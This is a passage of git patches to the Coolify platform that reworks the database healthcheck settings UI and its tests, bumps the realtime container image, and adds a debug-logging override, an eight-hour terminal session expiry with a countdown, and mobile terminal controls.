             <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.database.persistent-storage', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Persistent Storage</span></a>
-            <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
-                href="{{ route('project.database.healthcheck', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Healthcheck</span></a>
             @can('update', $database)
                 <a class='sub-menu-item' wire:current.exact="menu-item-active"
                     href="{{ route('project.database.import-backup', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Import Backup</span></a>
             @endcan
             <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.database.webhooks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Webhooks</span></a>
+            <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
+                href="{{ route('project.database.healthcheck', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Healthcheck</span></a>
             <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.database.resource-limits', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Resource Limits</span></a>
             <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
diff --git a/resources/views/livewire/project/database/health.blade.php b/resources/views/livewire/project/database/health.blade.php
index d869defc1..725500209 100644
--- a/resources/views/livewire/project/database/health.blade.php
+++ b/resources/views/livewire/project/database/health.blade.php
@@ -2,25 +2,34 @@
     <div class="flex items-center gap-2">
         <h2>Healthcheck</h2>
         <x-forms.button canGate="update" :canResource="$database" type="submit">Save</x-forms.button>
-    </div>
-    <div class="mt-1 pb-4">Configure how Docker checks this database's health. A higher interval lowers
-        <code>dockerd</code>/<code>containerd</code> CPU and load on servers running many databases. Restart the
-        database to apply changes.</div>
-    <div class="flex flex-col gap-4">
-        <x-forms.checkbox canGate="update" :canResource="$database" instantSave id="healthCheckEnabled"
-            label="Enabled"
-            helper="When disabled, Docker runs no healthcheck probe for this database and Coolify can no longer report a healthy/unhealthy state." />
-        @if ($healthCheckEnabled)
-            <div class="flex gap-2">
-                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckInterval"
-                    placeholder="15" label="Interval (s)" required />
-                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckTimeout"
-                    placeholder="5" label="Timeout (s)" required />
-                <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckRetries"
-                    placeholder="5" label="Retries" required />
-                <x-forms.input canGate="update" :canResource="$database" min="0" type="number"
-                    id="healthCheckStartPeriod" placeholder="5" label="Start Period (s)" required />
-            </div>
+        @if (!$healthCheckEnabled)
+            <x-modal-confirmation title="Confirm Healthcheck Enable?" buttonTitle="Enable Healthcheck"
+                submitAction="toggleHealthcheck" :actions="['Enable healthcheck for this database.']"
+                warningMessage="If the health check fails, this database will be marked unhealthy. Please review the <a href='https://coolify.io/docs/knowledge-base/health-checks' target='_blank' class='underline text-white'>Health Checks</a> guide before proceeding!"
+                step2ButtonText="Enable Healthcheck" :confirmWithText="false" :confirmWithPassword="false"
+                isHighlightedButton>
+            </x-modal-confirmation>
+        @else
+            <x-forms.button canGate="update" :canResource="$database" wire:click="toggleHealthcheck">Disable Healthcheck</x-forms.button>
         @endif
     </div>
+    <div class="mt-1 pb-4">Define how your resource's health should be checked.</div>
+    <div class="flex flex-col gap-4">
+        @if (!$healthCheckEnabled)
+            <x-callout type="warning" title="Healthcheck disabled">
+                <p>Docker runs no healthcheck probe for this database and Coolify can no longer report a healthy/unhealthy state.</p>
+            </x-callout>
+        @endif
+
+        <div class="flex gap-2">
+            <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckInterval"
+                placeholder="15" label="Interval (s)" required />
+            <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckTimeout"
+                placeholder="5" label="Timeout (s)" required />
+            <x-forms.input canGate="update" :canResource="$database" min="1" type="number" id="healthCheckRetries"
+                placeholder="5" label="Retries" required />
+            <x-forms.input canGate="update" :canResource="$database" min="0" type="number"
+                id="healthCheckStartPeriod" placeholder="5" label="Start Period (s)" required />
+        </div>
+    </div>
 </form>
diff --git a/resources/views/livewire/project/shared/health-checks.blade.php b/resources/views/livewire/project/shared/health-checks.blade.php
index 8662b0b50..ac2063c2e 100644
--- a/resources/views/livewire/project/shared/health-checks.blade.php
+++ b/resources/views/livewire/project/shared/health-checks.blade.php
@@ -1,6 +1,6 @@
 <form wire:submit='submit' class="flex flex-col">
     <div class="flex items-center gap-2">
-        <h2>Healthchecks</h2>
+        <h2>Healthcheck</h2>
         <x-forms.button canGate="update" :canResource="$resource" type="submit">Save</x-forms.button>
         @if (!$healthCheckEnabled)
             <x-modal-confirmation title="Confirm Healthcheck Enable?" buttonTitle="Enable Healthcheck"
diff --git a/tests/Feature/DatabaseHealthCheckTest.php b/tests/Feature/DatabaseHealthCheckTest.php
index 8bc1e4e92..9ccc3c53f 100644
--- a/tests/Feature/DatabaseHealthCheckTest.php
+++ b/tests/Feature/DatabaseHealthCheckTest.php
@@ -1,6 +1,8 @@
 <?php
 
+use App\Livewire\Project\Database\Health;
 use App\Models\StandalonePostgresql;
+use Illuminate\Auth\Access\AuthorizationException;
 
 it('defaults to an enabled healthcheck when nothing is configured', function () {
     $database = new StandalonePostgresql;
@@ -43,3 +45,131 @@
 
     expect($database->isHealthcheckEnabled())->toBeFalse();
 });
+
+it('uses distinct hash fragments for ambiguous healthcheck values', function () {
+    $enabledDatabase = new StandalonePostgresql([
+        'health_check_enabled' => true,
+        'health_check_interval' => 5,
+        'health_check_timeout' => 5,
+        'health_check_retries' => 5,
+        'health_check_start_period' => 5,
+    ]);
+
+    $disabledDatabase = new StandalonePostgresql([
+        'health_check_enabled' => false,
+        'health_check_interval' => 15,
+        'health_check_timeout' => 5,
+        'health_check_retries' => 5,
+        'health_check_start_period' => 5,
+    ]);
+
+    $getHashFragment = function () {
+        return $this->healthCheckConfigurationHash();
+    };
+
+    expect($getHashFragment->call($enabledDatabase))
+        ->toBe('1|5|5|5|5')
+        ->not->toBe($getHashFragment->call($disabledDatabase))
+        ->and($getHashFragment->call($disabledDatabase))->toBe('0|15|5|5|5');
+});
+
+it('does not mark configuration changed when health update authorization fails', function () {
+    $database = new class
+    {
+        public ?string $config_hash = null;
+
+        public int $configurationChangedChecks = 0;
+
+        public function isConfigurationChanged(bool $save = false): bool
+        {
+            $this->configurationChangedChecks++;
+
+            return true;
+        }
+    };
+
+    $component = new class extends Health
+    {
+        public array $dispatchedEvents = [];
+
+        public function authorize($ability, $arguments = [])
+        {
+            throw new AuthorizationException('This action is unauthorized.');
+        }
+
+        public function dispatch($event, ...$params)
+        {
+            $this->dispatchedEvents[] = $event;
+
+            return null;
+        }
+    };
+
+    $component->database = $database;
+    $component->submit();
+
+    expect($database->configurationChangedChecks)->toBe(0)
+        ->and($component->dispatchedEvents)->toBe(['error']);
+});
+
+it('toggles database healthcheck and marks configuration changed', function () {
+    $database = new class
+    {
+        public ?string $config_hash = 'existing';
+
+        public bool $health_check_enabled = false;
+
+        public int $health_check_interval = 15;
+
+        public int $health_check_timeout = 5;
+
+        public int $health_check_retries = 5;
+
+        public int $health_check_start_period = 5;
+
+        public int $saveCalls = 0;
+
+        public function save(): void
+        {
+            $this->saveCalls++;
+        }
+    };
+
+    $component = new class extends Health
+    {
+        public array $dispatchedEvents = [];
+
+        public function authorize($ability, $arguments = [])
+        {
+            return true;
+        }
+
+        public function dispatch($event, ...$params)
+        {
+            $this->dispatchedEvents[] = $event;
+
+            return null;
+        }
+
+        public function syncData(bool $toModel = false): void
+        {
+            if ($toModel) {
+                $this->database->health_check_enabled = $this->healthCheckEnabled;
+                $this->database->save();
+            }
+        }
+    };
+
+    $component->database = $database;
+    $component->healthCheckEnabled = false;
+    $component->healthCheckInterval = 15;
+    $component->healthCheckTimeout = 5;
+    $component->healthCheckRetries = 5;
+    $component->healthCheckStartPeriod = 5;
+
+    $component->toggleHealthcheck();
+
+    expect($database->health_check_enabled)->toBeTrue()
+        ->and($database->saveCalls)->toBe(1)
+        ->and($component->dispatchedEvents)->toBe(['success', 'configurationChanged']);
+});

From d1d6f083928b0e2831ea2768a05cc8432191c8e5 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 09:05:04 +0200
Subject: [PATCH 58/90] chore(realtime): bump image to 1.0.16

---
 docker-compose.prod.yml                  | 2 +-
 docker-compose.windows.yml               | 2 +-
 other/nightly/docker-compose.prod.yml    | 2 +-
 other/nightly/docker-compose.windows.yml | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/docker-compose.prod.yml b/docker-compose.prod.yml
index 3a9bfd501..8907a30b9 100644
--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ -60,7 +60,7 @@ services:
       retries: 10
       timeout: 2s
   soketi:
-    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.15'
+    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.16'
     ports:
       - "${SOKETI_PORT:-6001}:6001"
       - "6002:6002"
diff --git a/docker-compose.windows.yml b/docker-compose.windows.yml
index cc72d487b..da045fe03 100644
--- a/docker-compose.windows.yml
+++ b/docker-compose.windows.yml
@@ -96,7 +96,7 @@ services:
       retries: 10
       timeout: 2s
   soketi:
-    image: 'ghcr.io/coollabsio/coolify-realtime:1.0.15'
+    image: 'ghcr.io/coollabsio/coolify-realtime:1.0.16'
     pull_policy: always
     container_name: coolify-realtime
     restart: always
diff --git a/other/nightly/docker-compose.prod.yml b/other/nightly/docker-compose.prod.yml
index 3a9bfd501..8907a30b9 100644
--- a/other/nightly/docker-compose.prod.yml
+++ b/other/nightly/docker-compose.prod.yml
@@ -60,7 +60,7 @@ services:
       retries: 10
       timeout: 2s
   soketi:
-    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.15'
+    image: '${REGISTRY_URL:-ghcr.io}/coollabsio/coolify-realtime:1.0.16'
     ports:
       - "${SOKETI_PORT:-6001}:6001"
       - "6002:6002"
diff --git a/other/nightly/docker-compose.windows.yml b/other/nightly/docker-compose.windows.yml
index cc72d487b..da045fe03 100644
--- a/other/nightly/docker-compose.windows.yml
+++ b/other/nightly/docker-compose.windows.yml
@@ -96,7 +96,7 @@ services:
       retries: 10
       timeout: 2s
   soketi:
-    image: 'ghcr.io/coollabsio/coolify-realtime:1.0.15'
+    image: 'ghcr.io/coollabsio/coolify-realtime:1.0.16'
     pull_policy: always
     container_name: coolify-realtime
     restart: always

From 4d3182c938cd9d479f163b6e67df1b92f15ff938 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 09:08:20 +0200
Subject: [PATCH 59/90] fix(terminal): allow debug logging via env override

---
 docker/coolify-realtime/terminal-server.js | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/docker/coolify-realtime/terminal-server.js b/docker/coolify-realtime/terminal-server.js
index c76383b9f..22973d88c 100755
--- a/docker/coolify-realtime/terminal-server.js
+++ b/docker/coolify-realtime/terminal-server.js
@@ -63,9 +63,11 @@ function createHttpError(response) {
 }
 
 const userSessions = new Map();
-const terminalDebugEnabled = ['local', 'development'].includes(
-    String(process.env.APP_ENV || process.env.NODE_ENV || '').toLowerCase()
-);
+const envName = String(process.env.APP_ENV || process.env.NODE_ENV || '').toLowerCase();
+const debugOverride = String(process.env.TERMINAL_DEBUG || '').toLowerCase();
+const terminalDebugEnabled =
+    ['local', 'development'].includes(envName)
+    || ['1', 'true', 'yes', 'on'].includes(debugOverride);
 
 function logTerminal(level, message, context = {}) {
     if (!terminalDebugEnabled) {

From 53f24df0a0c0d781b74c8e53278dc8f6e711d791 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 09:45:56 +0200
Subject: [PATCH 60/90] fix(terminal): enforce eight hour session expiry

Add a visible countdown in the terminal UI and terminate realtime PTY
sessions after the fixed maximum lifetime.
---
 docker/coolify-realtime/terminal-server.js    | 34 +++++++--
 docker/coolify-realtime/terminal-utils.js     |  6 ++
 .../coolify-realtime/terminal-utils.test.js   |  9 +++
 resources/js/terminal-session-timer.js        | 22 ++++++
 resources/js/terminal.js                      | 73 +++++++++++++++++++
 resources/js/terminal.test.js                 | 15 ++++
 .../project/shared/terminal.blade.php         |  5 ++
 7 files changed, 156 insertions(+), 8 deletions(-)
 create mode 100644 resources/js/terminal-session-timer.js
 create mode 100644 resources/js/terminal.test.js

diff --git a/docker/coolify-realtime/terminal-server.js b/docker/coolify-realtime/terminal-server.js
index 22973d88c..519792716 100755
--- a/docker/coolify-realtime/terminal-server.js
+++ b/docker/coolify-realtime/terminal-server.js
@@ -8,6 +8,7 @@ import {
     extractSshArgs,
     extractTargetHost,
     extractTimeout,
+    getTerminalSessionTimeout,
     isAuthorizedTargetHost,
 } from './terminal-utils.js';
 
@@ -171,6 +172,7 @@ wss.on('connection', async (ws, req) => {
         authorizedIPs: [],
         authReady: false,
         pendingMessages: [],
+        terminalSessionTimer: null,
     };
     const { xsrfToken, laravelSession, sessionCookieName } = getSessionCookie(req);
     const connectionContext = {
@@ -340,8 +342,14 @@ async function handleCommand(ws, command, userId) {
         }
     }
 
+    if (userSession.terminalSessionTimer) {
+        clearTimeout(userSession.terminalSessionTimer);
+        userSession.terminalSessionTimer = null;
+    }
+
     const commandString = command[0].split('\n').join(' ');
-    const timeout = extractTimeout(commandString);
+    const commandTimeout = extractTimeout(commandString);
+    const terminalSessionTimeout = getTerminalSessionTimeout();
     const sshArgs = extractSshArgs(commandString);
     const hereDocContent = extractHereDocContent(commandString);
 
@@ -350,7 +358,8 @@ async function handleCommand(ws, command, userId) {
     logTerminal('log', 'Parsed terminal command metadata.', {
         userId,
         targetHost,
-        timeout,
+        commandTimeout,
+        terminalSessionTimeout,
         sshArgs,
         authorizedIPs: userSession?.authorizedIPs ?? [],
     });
@@ -389,7 +398,8 @@ async function handleCommand(ws, command, userId) {
     logTerminal('log', 'Spawning PTY process for terminal session.', {
         userId,
         targetHost,
-        timeout,
+        commandTimeout,
+        terminalSessionTimeout,
     });
     const ptyProcess = pty.spawn('ssh', sshArgs.concat([hereDocContent]), options);
 
@@ -411,13 +421,16 @@ async function handleCommand(ws, command, userId) {
         });
         ws.send('pty-exited');
         userSession.isActive = false;
+
+        if (userSession.terminalSessionTimer) {
+            clearTimeout(userSession.terminalSessionTimer);
+            userSession.terminalSessionTimer = null;
+        }
     });
 
-    if (timeout) {
-        setTimeout(async () => {
-            await killPtyProcess(userId);
-        }, timeout * 1000);
-    }
+    userSession.terminalSessionTimer = setTimeout(async () => {
+        await killPtyProcess(userId);
+    }, terminalSessionTimeout * 1000);
 }
 
 async function handleError(err, userId) {
@@ -459,6 +472,11 @@ async function killPtyProcess(userId) {
 
             setTimeout(() => {
                 if (!session.isActive || !session.ptyProcess) {
+                    if (session.terminalSessionTimer) {
+                        clearTimeout(session.terminalSessionTimer);
+                        session.terminalSessionTimer = null;
+                    }
+
                     logTerminal('log', 'PTY process terminated successfully.', {
                         userId,
                         killAttempts,
diff --git a/docker/coolify-realtime/terminal-utils.js b/docker/coolify-realtime/terminal-utils.js
index 7456b282c..8769d62d9 100644
--- a/docker/coolify-realtime/terminal-utils.js
+++ b/docker/coolify-realtime/terminal-utils.js
@@ -1,3 +1,9 @@
+export const MAX_TERMINAL_SESSION_TIMEOUT_SECONDS = 8 * 60 * 60;
+
+export function getTerminalSessionTimeout() {
+    return MAX_TERMINAL_SESSION_TIMEOUT_SECONDS;
+}
+
 export function extractTimeout(commandString) {
     const timeoutMatch = commandString.match(/timeout (\d+)/);
     return timeoutMatch ? parseInt(timeoutMatch[1], 10) : null;
diff --git a/docker/coolify-realtime/terminal-utils.test.js b/docker/coolify-realtime/terminal-utils.test.js
index 3da444155..bf863099b 100644
--- a/docker/coolify-realtime/terminal-utils.test.js
+++ b/docker/coolify-realtime/terminal-utils.test.js
@@ -1,8 +1,10 @@
 import test from 'node:test';
 import assert from 'node:assert/strict';
 import {
+    MAX_TERMINAL_SESSION_TIMEOUT_SECONDS,
     extractSshArgs,
     extractTargetHost,
+    getTerminalSessionTimeout,
     isAuthorizedTargetHost,
     normalizeHostForAuthorization,
 } from './terminal-utils.js';
@@ -45,3 +47,10 @@ test('normalizeHostForAuthorization unwraps bracketed IPv6 hosts', () => {
 test('isAuthorizedTargetHost rejects hosts that are not in the allowlist', () => {
     assert.equal(isAuthorizedTargetHost("'10.0.0.9'", ['10.0.0.5']), false);
 });
+
+
+test('getTerminalSessionTimeout always enforces the maximum terminal session lifetime', () => {
+    assert.equal(getTerminalSessionTimeout(null), MAX_TERMINAL_SESSION_TIMEOUT_SECONDS);
+    assert.equal(getTerminalSessionTimeout(60), MAX_TERMINAL_SESSION_TIMEOUT_SECONDS);
+    assert.equal(getTerminalSessionTimeout(MAX_TERMINAL_SESSION_TIMEOUT_SECONDS + 60), MAX_TERMINAL_SESSION_TIMEOUT_SECONDS);
+});
diff --git a/resources/js/terminal-session-timer.js b/resources/js/terminal-session-timer.js
new file mode 100644
index 000000000..60c7f7311
--- /dev/null
+++ b/resources/js/terminal-session-timer.js
@@ -0,0 +1,22 @@
+export const MAX_TERMINAL_SESSION_SECONDS = 8 * 60 * 60;
+export const TERMINAL_SESSION_WARNING_SECONDS = 30 * 60;
+export const TERMINAL_SESSION_DANGER_SECONDS = 5 * 60;
+
+export function formatTerminalSessionRemainingTime(seconds) {
+    const remainingSeconds = Math.max(0, Math.ceil(seconds));
+
+    if (remainingSeconds === 0) {
+        return 'expired';
+    }
+
+    const totalMinutes = Math.floor(remainingSeconds / 60);
+    const hours = Math.floor(totalMinutes / 60);
+    const minutes = totalMinutes % 60;
+    const secondsPart = remainingSeconds % 60;
+
+    if (hours === 0) {
+        return `${minutes}m ${String(secondsPart).padStart(2, '0')}s`;
+    }
+
+    return `${hours}h ${String(minutes).padStart(2, '0')}m ${String(secondsPart).padStart(2, '0')}s`;
+}
diff --git a/resources/js/terminal.js b/resources/js/terminal.js
index cb3a26b3a..6c1d3057a 100644
--- a/resources/js/terminal.js
+++ b/resources/js/terminal.js
@@ -1,5 +1,11 @@
 import { Terminal } from '@xterm/xterm';
 import '@xterm/xterm/css/xterm.css';
+import {
+    MAX_TERMINAL_SESSION_SECONDS,
+    TERMINAL_SESSION_DANGER_SECONDS,
+    TERMINAL_SESSION_WARNING_SECONDS,
+    formatTerminalSessionRemainingTime,
+} from './terminal-session-timer.js';
 import { FitAddon } from '@xterm/addon-fit';
 
 const terminalDebugEnabled = import.meta.env.DEV;
@@ -52,6 +58,9 @@ export function initializeTerminalComponent() {
             // Visibility handling - prevent disconnects when tab loses focus
             isDocumentVisible: true,
             wasConnectedBeforeHidden: false,
+            terminalSessionStartedAt: null,
+            terminalSessionRemainingSeconds: null,
+            terminalSessionCountdownInterval: null,
 
             init() {
                 this.setupTerminal();
@@ -135,6 +144,7 @@ export function initializeTerminalComponent() {
                 this.clearAllTimers();
                 this.connectionState = 'disconnected';
                 this.pendingCommand = null;
+                this.resetTerminalSessionCountdown();
                 if (this.socket) {
                     this.socket.close(1000, 'Client cleanup');
                 }
@@ -157,11 +167,68 @@ export function initializeTerminalComponent() {
                 }
                 [this.reconnectInterval, this.connectionTimeoutId, this.pingTimeoutId, this.resizeTimeout]
                     .forEach(timer => timer && clearTimeout(timer));
+                if (this.terminalSessionCountdownInterval) {
+                    clearInterval(this.terminalSessionCountdownInterval);
+                }
                 this.keepAliveInterval = null;
                 this.reconnectInterval = null;
                 this.connectionTimeoutId = null;
                 this.pingTimeoutId = null;
                 this.resizeTimeout = null;
+                this.terminalSessionCountdownInterval = null;
+            },
+
+            resetTerminalSessionCountdown() {
+                if (this.terminalSessionCountdownInterval) {
+                    clearInterval(this.terminalSessionCountdownInterval);
+                }
+
+                this.terminalSessionStartedAt = null;
+                this.terminalSessionRemainingSeconds = null;
+                this.terminalSessionCountdownInterval = null;
+            },
+
+            startTerminalSessionCountdown() {
+                this.resetTerminalSessionCountdown();
+                this.terminalSessionStartedAt = Date.now();
+                this.updateTerminalSessionCountdown();
+                this.terminalSessionCountdownInterval = setInterval(() => {
+                    this.updateTerminalSessionCountdown();
+                }, 1000);
+            },
+
+            updateTerminalSessionCountdown() {
+                if (!this.terminalSessionStartedAt) {
+                    this.terminalSessionRemainingSeconds = null;
+                    return;
+                }
+
+                const elapsedSeconds = (Date.now() - this.terminalSessionStartedAt) / 1000;
+                this.terminalSessionRemainingSeconds = Math.max(0, MAX_TERMINAL_SESSION_SECONDS - elapsedSeconds);
+            },
+
+            terminalSessionRemainingLabel() {
+                if (this.terminalSessionRemainingSeconds === null) {
+                    return '';
+                }
+
+                return `Session expires in ${formatTerminalSessionRemainingTime(this.terminalSessionRemainingSeconds)}`;
+            },
+
+            terminalSessionTimerClass() {
+                if (this.terminalSessionRemainingSeconds === null) {
+                    return 'text-neutral-300 bg-black/70 border-white/10';
+                }
+
+                if (this.terminalSessionRemainingSeconds <= TERMINAL_SESSION_DANGER_SECONDS) {
+                    return 'text-red-200 bg-red-950/80 border-red-500/40';
+                }
+
+                if (this.terminalSessionRemainingSeconds <= TERMINAL_SESSION_WARNING_SECONDS) {
+                    return 'text-yellow-200 bg-yellow-950/80 border-yellow-500/40';
+                }
+
+                return 'text-neutral-300 bg-black/70 border-white/10';
             },
 
             resetTerminal() {
@@ -181,6 +248,7 @@ export function initializeTerminalComponent() {
                     this.paused = false;
                     this.commandBuffer = '';
                     this.pendingCommand = null;
+                    this.resetTerminalSessionCountdown();
 
                     // Notify parent component that terminal disconnected
                     this.$wire.dispatch('terminalDisconnected');
@@ -328,6 +396,7 @@ export function initializeTerminalComponent() {
 
                 this.connectionState = 'disconnected';
                 this.clearAllTimers();
+                this.resetTerminalSessionCountdown();
 
                 // Only reset terminal and reconnect if it wasn't a clean close
                 if (event.code !== 1000) {
@@ -424,6 +493,7 @@ export function initializeTerminalComponent() {
                         }
                     }
                     this.terminalActive = true;
+                    this.startTerminalSessionCountdown();
                     this.term.focus();
                     document.querySelector('.xterm-viewport').classList.add('scrollbar', 'rounded-sm');
 
@@ -450,12 +520,14 @@ export function initializeTerminalComponent() {
                     if (this.term) this.term.reset();
                     this.terminalActive = false;
                     this.lastSentCommand = null;
+                    this.resetTerminalSessionCountdown();
                     this.message = '(sorry, something went wrong, please try again)';
 
                     // Notify parent component that terminal connection failed
                     this.$wire.dispatch('terminalDisconnected');
                 } else if (event.data === 'pty-exited') {
                     this.terminalActive = false;
+                    this.resetTerminalSessionCountdown();
                     this.term.reset();
                     this.commandBuffer = '';
                     this.lastSentCommand = null;
@@ -469,6 +541,7 @@ export function initializeTerminalComponent() {
                     logTerminal('error', '[Terminal] Backend rejected terminal startup:', event.data);
                     this.$wire.dispatch('error', event.data);
                     this.terminalActive = false;
+                    this.resetTerminalSessionCountdown();
                 } else {
                     try {
                         this.pendingWrites++;
diff --git a/resources/js/terminal.test.js b/resources/js/terminal.test.js
new file mode 100644
index 000000000..e0a4fb852
--- /dev/null
+++ b/resources/js/terminal.test.js
@@ -0,0 +1,15 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import {
+    MAX_TERMINAL_SESSION_SECONDS,
+    formatTerminalSessionRemainingTime,
+} from './terminal-session-timer.js';
+
+test('formatTerminalSessionRemainingTime formats the eight hour terminal limit countdown', () => {
+    assert.equal(MAX_TERMINAL_SESSION_SECONDS, 8 * 60 * 60);
+    assert.equal(formatTerminalSessionRemainingTime(MAX_TERMINAL_SESSION_SECONDS), '8h 00m 00s');
+    assert.equal(formatTerminalSessionRemainingTime((7 * 60 * 60) + (59 * 60) + 59), '7h 59m 59s');
+    assert.equal(formatTerminalSessionRemainingTime(65 * 60), '1h 05m 00s');
+    assert.equal(formatTerminalSessionRemainingTime(59), '0m 59s');
+    assert.equal(formatTerminalSessionRemainingTime(0), 'expired');
+});
diff --git a/resources/views/livewire/project/shared/terminal.blade.php b/resources/views/livewire/project/shared/terminal.blade.php
index abcb366f5..97f4c65d6 100644
--- a/resources/views/livewire/project/shared/terminal.blade.php
+++ b/resources/views/livewire/project/shared/terminal.blade.php
@@ -23,6 +23,11 @@
     <div x-ref="terminalWrapper"
         :class="fullscreen ? 'fullscreen !bg-black' : 'relative w-full h-full py-4 mx-auto max-h-[510px]'">
         <!-- Terminal container -->
+        <div x-show="terminalActive" x-cloak class="mb-2 flex justify-start">
+            <div class="inline-flex rounded-sm border px-2 py-1 text-xs font-medium"
+                :class="terminalSessionTimerClass()" x-text="terminalSessionRemainingLabel()">
+            </div>
+        </div>
         <div id="terminal" wire:ignore
             :class="fullscreen ? 'px-2 py-1 h-full bg-black' : 'px-2 py-1 rounded-sm bg-black'" x-show="terminalActive">
         </div>

From ec367549b4807784bba10ad38b9ef717a733b29b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 10:13:56 +0200
Subject: [PATCH 61/90] feat(terminal): add mobile shell controls

Add a compact mobile toolbar for fullscreen terminal control keys and adjust terminal sizing so the toolbar does not cover rows.
---
 resources/css/app.css                         |  7 ++
 resources/js/terminal.js                      | 80 ++++++++++++++--
 .../project/shared/terminal.blade.php         | 26 +++++-
 .../Feature/RealtimeTerminalPackagingTest.php | 93 ++++++++++++++++++-
 4 files changed, 194 insertions(+), 12 deletions(-)

diff --git a/resources/css/app.css b/resources/css/app.css
index 936e0c713..de92bf0c9 100644
--- a/resources/css/app.css
+++ b/resources/css/app.css
@@ -53,6 +53,13 @@ @theme {
   If we ever want to remove these styles, we need to add an explicit border
   color utility to any element that depends on these defaults.
 */
+
+@layer components {
+    .terminal-mobile-key {
+        @apply min-h-10 rounded-md border border-white/10 bg-white/10 px-2 py-2 text-sm font-semibold text-white shadow-inner active:bg-white/25;
+    }
+}
+
 @layer base {
 
     *,
diff --git a/resources/js/terminal.js b/resources/js/terminal.js
index 7a7fc8536..8498f4356 100644
--- a/resources/js/terminal.js
+++ b/resources/js/terminal.js
@@ -52,6 +52,7 @@ export function initializeTerminalComponent() {
             // Visibility handling - prevent disconnects when tab loses focus
             isDocumentVisible: true,
             wasConnectedBeforeHidden: false,
+            mobileToolbarCollapsed: false,
 
             init() {
                 this.setupTerminal();
@@ -538,6 +539,64 @@ export function initializeTerminalComponent() {
                 });
             },
 
+
+            sendTerminalInput(data) {
+                if (!this.term || !this.terminalActive) {
+                    return;
+                }
+
+                this.term.focus();
+                this.sendMessage({ message: data });
+            },
+
+            sendTerminalControl(sequence) {
+                const terminalSequences = {
+                    arrowUp: '\x1b[A',
+                    arrowDown: '\x1b[B',
+                    arrowRight: '\x1b[C',
+                    arrowLeft: '\x1b[D',
+                    tab: '\t',
+                    escape: '\x1b',
+                    ctrlC: '\x03'
+                };
+
+                if (terminalSequences[sequence]) {
+                    this.sendTerminalInput(terminalSequences[sequence]);
+                }
+            },
+
+            async pasteFromClipboard() {
+                if (!navigator.clipboard?.readText) {
+                    this.$wire.dispatch('error', 'Clipboard paste is not available in this browser.');
+                    return;
+                }
+
+                try {
+                    const text = await navigator.clipboard.readText();
+                    if (text) {
+                        this.sendTerminalInput(text);
+                    }
+                } catch (error) {
+                    logTerminal('warn', '[Terminal] Clipboard paste failed:', error);
+                    this.$wire.dispatch('error', 'Clipboard paste permission was denied.');
+                }
+            },
+
+            async copyTerminalSelection() {
+                const selection = this.term?.getSelection();
+                if (!selection) {
+                    this.$wire.dispatch('error', 'Select terminal text before copying.');
+                    return;
+                }
+
+                try {
+                    await navigator.clipboard.writeText(selection);
+                } catch (error) {
+                    logTerminal('warn', '[Terminal] Clipboard copy failed:', error);
+                    this.$wire.dispatch('error', 'Clipboard copy permission was denied.');
+                }
+            },
+
             keepAlive() {
                 if (this.socket && this.socket.readyState === WebSocket.OPEN) {
                     this.sendMessage({ ping: true });
@@ -629,15 +688,20 @@ export function initializeTerminalComponent() {
                     // Force a refresh of the fit addon dimensions
                     this.fitAddon.fit();
 
-                    // Get fresh dimensions after fit
-                    const wrapperHeight = this.$refs.terminalWrapper.clientHeight;
-                    const wrapperWidth = this.$refs.terminalWrapper.clientWidth;
+                    // Get fresh dimensions from the terminal element itself. The mobile
+                    // toolbar can live beside the terminal in normal flow, so wrapper dimensions
+                    // would include controls that should not be counted as terminal rows.
+                    const terminalElement = document.getElementById('terminal');
+                    const terminalHeight = terminalElement?.clientHeight || this.$refs.terminalWrapper.clientHeight;
+                    const terminalWidth = terminalElement?.clientWidth || this.$refs.terminalWrapper.clientWidth;
 
-                    // Account for terminal container padding (px-2 py-1 = 8px left/right, 4px top/bottom)
-                    const horizontalPadding = 16; // 8px * 2 (left + right)
-                    const verticalPadding = 8; // 4px * 2 (top + bottom)
-                    const height = wrapperHeight - verticalPadding;
-                    const width = wrapperWidth - horizontalPadding;
+                    // Account for terminal container padding. In fullscreen mobile mode,
+                    // the fixed toolbar sits over the terminal container, so reserve its height
